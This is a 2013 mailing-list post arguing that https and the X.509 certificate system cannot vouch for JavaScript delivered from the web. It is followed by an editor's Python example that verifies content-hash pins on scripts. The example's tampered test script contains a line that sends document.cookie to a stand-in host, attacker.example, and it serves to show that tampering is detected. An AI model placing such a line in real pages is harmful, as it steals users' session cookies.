Security and Javascript
Werner Koch
wk at gnupg.org
Fri Jun 28 20:09:54 UTC 2013
On Fri, 28 Jun 2013 13:34, timo.lindfors at iki.fi said:
> btw, no need to Cc: me since I'm on the list.
[ Then please set an MFT header and my MUA will comply. That discussion
is > 15 years old and we have since then a working solution.]
> But surely virus checker is a blacklist and javascript isolation is more
> like a whitelist?
It is a blacklist. For example: the code loaded from an external source may
not open a file on the user's host. A whitelist would clearly state what the
code is allowed to do. But then it wouldn't be a useful language
anymore.
>> - The user is enabled to control the code.
>
> Well in most cases they are not since the plugins are non-free..
We are talking about security and thus free or non-free is just one data
point to evaluate whether it is secure. Even a non-free plugin may be
considered secure in some organizations. But right, free software is
much more useful in this regard.
>> - The plugin has a well defined behaviour and is not a volatile bunch
>> of code.
>
> Not sure what this would mean, at least oracle java plugin updates try
> to trick users into installing ask toolbar:
That is a feature which needs to be evaluated during the audit. There
are pros and cons to automated updates. But even such automated updates
are standard in that they have a defined version with the same code at
all sites. That can't be guaranteed by the usual use of JS, which
commonly comes from a whole bunch of sites (and is the reason why it is
virtually impossible not to use Google).
>> - A security audit of the plugin can be done.
>
> See the point about non-free plugins :(
That usually makes the audit easy: We can't audit it thus it shall not
be used.
>> Please, I don't want to hear a claim, that the JS code on web sites is
>> secure because it is signed or distributed via a trusted (https) web
>> site. PKIX (the X.509 based infrastructure used by https) is fucked up
>> beyond all repair.
>
> I guess you need to define "secure" bit better here.
Here in the sense that it is a well defined set of code which comes with
a signature and can be tracked back to an audit or a trusted source. It
can't: MitM attacks on PKIX are commonplace. Does anyone really believe
that the NSA has no means to ask another secret service to have one of
their national CAs issue a malicious certificate? Come on: that system
has been corrupted by the PKI business ever since. Nobody can expect
that they ever withstood requests from the slouch hats.
Salam-Shalom,
Werner
--
Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz.
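Editor's added example, not code from Werner's post or from GnuPG: the
post's complaint is that "delivered over https" does not make a script a
well defined set of code, because the transport trust rests on any of
hundreds of CAs. A check that does pin the exact audited bytes, independent
of which CA signed the connection, is a content hash published out of band.
The checker below is modelled on the Subresource Integrity token format
(`sha256-<base64 digest>`, several tokens separated by whitespace, the
strongest listed algorithm decides), and it fails closed on empty or
unrecognised pins. The two scripts and the host name are constructed for
the example and belong to no real site.

```python
import base64
import hashlib
import hmac

# Constructed sample input (not real code from any site): the audited
# script and a variant a man-in-the-middle might substitute on the wire.
AUDITED_SCRIPT = b"window.onload = function () { document.title = 'hello'; };\n"
TAMPERED_SCRIPT = AUDITED_SCRIPT + b"fetch('https://attacker.example/c?' + document.cookie);\n"

# Accepted digest algorithms, weakest to strongest. MD5 and SHA-1 are
# deliberately absent: a pin in those algorithms is treated as no pin.
ALLOWED_ALGORITHMS = ("sha256", "sha384", "sha512")


def make_integrity(data: bytes, algorithm: str = "sha256") -> str:
    """Produce an 'alg-base64digest' token for the audited bytes, to be
    published out of band (e.g. alongside the audit report), not on the
    page whose delivery we distrust."""
    if algorithm not in ALLOWED_ALGORITHMS:
        raise ValueError(f"unsupported algorithm: {algorithm}")
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def parse_integrity(value: str) -> dict[str, set[bytes]]:
    """Parse whitespace-separated tokens into {algorithm: {digests}}.
    Tokens with an unknown algorithm, bad base64, or a digest of the
    wrong length are ignored; the caller fails closed if nothing is left."""
    pins: dict[str, set[bytes]] = {}
    for token in value.split():
        alg, sep, b64 = token.partition("-")
        if not sep or alg not in ALLOWED_ALGORITHMS:
            continue
        try:
            digest = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if len(digest) != hashlib.new(alg).digest_size:
            continue
        pins.setdefault(alg, set()).add(digest)
    return pins


def verify_pinned(data: bytes, integrity: str) -> bool:
    """True only if the bytes match one of the digests listed under the
    strongest algorithm present. Several digests of one algorithm allow
    an overlap period while an old and a new audited version coexist."""
    pins = parse_integrity(integrity)
    if not pins:
        return False  # no usable pin: refuse rather than trust the transport
    strongest = max(pins, key=ALLOWED_ALGORITHMS.index)
    actual = hashlib.new(strongest, data).digest()
    return any(hmac.compare_digest(actual, d) for d in pins[strongest])


def demo() -> dict[str, bool]:
    """Run the checker over the constructed scripts and return the verdicts."""
    pin = make_integrity(AUDITED_SCRIPT)
    return {
        "audited_passes": verify_pinned(AUDITED_SCRIPT, pin),
        "tampered_fails": not verify_pinned(TAMPERED_SCRIPT, pin),
        "md5_pin_rejected": not verify_pinned(AUDITED_SCRIPT, "md5-XrY7u+Ae7tCTyyK7j1rNww=="),
        "empty_pin_rejected": not verify_pinned(AUDITED_SCRIPT, ""),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The pin only fixes which bytes run; it says nothing about whether those
bytes deserved the audit's verdict, and it is worthless if the pin travels
over the same channel as the script, since whoever can swap the script can
swap the pin. That is the part no certificate chain supplies.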